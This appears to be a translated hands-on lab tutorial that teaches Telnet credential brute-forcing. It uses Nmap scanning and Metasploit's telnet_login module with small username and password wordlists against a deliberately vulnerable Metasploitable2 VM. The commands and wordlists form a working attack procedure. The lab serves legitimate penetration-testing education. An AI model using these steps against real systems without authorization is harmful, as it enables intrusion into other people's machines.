利用 Telnet 服务漏洞

CybersecurityCybersecurityBeginner
立即练习

💡 本教程由 AI 辅助翻译自英文原版。如需查看原文,您可以 切换至英文原版

介绍

在本实验中,我们将学习如何利用 Telnet 服务漏洞并执行渗透攻击。场景涉及使用 Kali Linux 机器作为攻击机,Metasploitable2 虚拟机作为目标机。目标是扫描目标机的漏洞,识别 Telnet 服务漏洞,并使用 Metasploit Framework 对其进行利用。


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL cybersecurity(("`Cybersecurity`")) -.-> cybersecurity/NmapGroup(["`Nmap`"]) cybersecurity(("`Cybersecurity`")) -.-> cybersecurity/WiresharkGroup(["`Wireshark`"]) cybersecurity(("`Cybersecurity`")) -.-> cybersecurity/HydraGroup(["`Hydra`"]) cybersecurity/NmapGroup -.-> cybersecurity/nmap_installation("`Nmap Installation and Setup`") cybersecurity/NmapGroup -.-> cybersecurity/nmap_port_scanning("`Nmap Port Scanning Methods`") cybersecurity/NmapGroup -.-> cybersecurity/nmap_host_discovery("`Nmap Host Discovery Techniques`") cybersecurity/NmapGroup -.-> cybersecurity/nmap_target_specification("`Nmap Target Specification`") cybersecurity/NmapGroup -.-> cybersecurity/nmap_timing_performance("`Nmap Timing and Performance`") cybersecurity/NmapGroup -.-> cybersecurity/nmap_service_detection("`Nmap Service Detection`") cybersecurity/NmapGroup -.-> cybersecurity/nmap_scripting_basics("`Nmap Scripting Engine Basics`") cybersecurity/WiresharkGroup -.-> cybersecurity/ws_commandline_usage("`Wireshark Command Line Usage`") cybersecurity/HydraGroup -.-> cybersecurity/hydra_installation("`Hydra Installation`") subgraph Lab Skills cybersecurity/nmap_installation -.-> lab-416133{{"`利用 Telnet 服务漏洞`"}} cybersecurity/nmap_port_scanning -.-> lab-416133{{"`利用 Telnet 服务漏洞`"}} cybersecurity/nmap_host_discovery -.-> lab-416133{{"`利用 Telnet 服务漏洞`"}} cybersecurity/nmap_target_specification -.-> lab-416133{{"`利用 Telnet 服务漏洞`"}} cybersecurity/nmap_timing_performance -.-> lab-416133{{"`利用 Telnet 服务漏洞`"}} cybersecurity/nmap_service_detection -.-> lab-416133{{"`利用 Telnet 服务漏洞`"}} cybersecurity/nmap_scripting_basics -.-> lab-416133{{"`利用 Telnet 服务漏洞`"}} cybersecurity/ws_commandline_usage -.-> lab-416133{{"`利用 Telnet 服务漏洞`"}} cybersecurity/hydra_installation -.-> lab-416133{{"`利用 Telnet 服务漏洞`"}} end

启动实验环境

在这一步中,我们将启动实验环境,其中包括 Kali Linux 容器和 Metasploitable2 虚拟机。

  1. 在 LabEx 主机上打开一个 xfce 终端,并通过运行以下命令启动 Metasploitable2 目标机:
sudo virsh start Metasploitable2

等待目标机器启动,可能需要1-3分钟。

  1. 通过 ping 命令测试与目标机的连接:
ping 192.168.122.102

按下 Ctrl+C 停止 ping。

  1. 启动 Kali Linux 容器并进入 bash 环境,运行以下命令:
docker run -ti --network host b5b709a49cd5 bash
  1. 在 Kali 容器内,测试与目标机的网络连接:
ping 192.168.122.102

按下 Ctrl+C 停止 ping。

现在攻击机和目标机都已启动,你可以开始进行渗透测试。

注意:如果你意外退出了当前的 bash,Kali 容器将自动停止。你可以在主机上再次执行 docker run -ti --network host b5b709a49cd5 bash 来启动一个新的 Kali 容器并进入 bash 以继续实验。

执行漏洞扫描

在这一步中,我们将使用 Nmap 扫描目标机以查找开放的端口和服务。

首先,启动 PostgreSQL 数据库,因为 Metasploit 需要它来存储数据:

service postgresql start
msfdb init
cd ~
msfconsole

在 Metasploit 控制台中,对目标机运行 Nmap 扫描:

nmap -sV -T4 192.168.122.102

-sV 选项扫描开放的端口并显示详细的端口信息,而 -T4 设置扫描时间策略(0-5,数值越高速度越快但噪音更大)。

分析扫描结果

在这一步中,我们将分析 Nmap 扫描结果,以识别存在漏洞的 Telnet 服务。

Nmap 扫描输出显示 Telnet 服务正在端口 23 上运行,并显示横幅信息 "Linux telnetd"。让我们搜索对应的 Metasploit 模块:

search scanner/telnet

使用 auxiliary/scanner/telnet/telnet_login 模块:

use auxiliary/scanner/telnet/telnet_login

显示模块选项:

show options

必需的选项是 RHOSTS,它用于指定目标主机。

按下 Ctrl+D 退出 Metasploit 控制台,然后开始检查

准备用户名和密码字典

在这一步中,我们将为登录暴力破解攻击准备用户名和密码字典文件。

打开一个新的终端并连接到 Kali 容器:

docker run -ti --network host b5b709a49cd5 bash

/ 目录下创建一个文件 username.txt,内容如下:

123456
admin
msfadmin
root
kali

/ 目录下创建另一个文件 password.txt,内容如下:

abc123
1234
123456
root
msfadmin
admin
toor

这些文件将用作暴力破解攻击的用户名和密码字典。

配置 Metasploit 模块

在这一步中,我们将为目标主机、用户名字典和密码字典配置 Metasploit 模块。

首先,如果你不在 Metasploit 控制台中,你需要启动 Metasploit 控制台:

cd ~
msfconsole

使用 auxiliary/scanner/telnet/telnet_login 模块:

use auxiliary/scanner/telnet/telnet_login

设置目标主机:

set RHOSTS 192.168.122.102

设置用户名字典文件:

set USER_FILE /username.txt

设置密码字典文件:

set PASS_FILE /password.txt

最后,运行漏洞利用:

exploit

Metasploit 将开始尝试从提供的字典中使用不同的用户名和密码组合。如果找到有效的凭据,它将以绿色显示。

在这种情况下,有效的凭据是 msfadmin/msfadmin

按下 Ctrl+D 退出 Metasploit 控制台,然后开始检查

总结

在本实验中,我们学习了如何使用 Metasploit Framework 利用 Telnet 服务漏洞。我们首先使用 Kali Linux 攻击机和 Metasploitable2 目标机搭建了实验环境。接着,我们使用 Nmap 进行漏洞扫描,识别出开放的 Telnet 服务。然后,我们准备了用户名和密码字典,并为目标主机和字典文件配置了 Metasploit 模块。最后,我们执行了漏洞利用,并成功暴力破解了 Telnet 登录凭据。

本实验提供了渗透测试、漏洞扫描以及利用 Metasploit Framework 进行漏洞利用的实践经验。它强调了安全密码实践的重要性,以及使用弱密码或易猜测凭据的潜在风险。

您可能感兴趣的其他 Cybersecurity 教程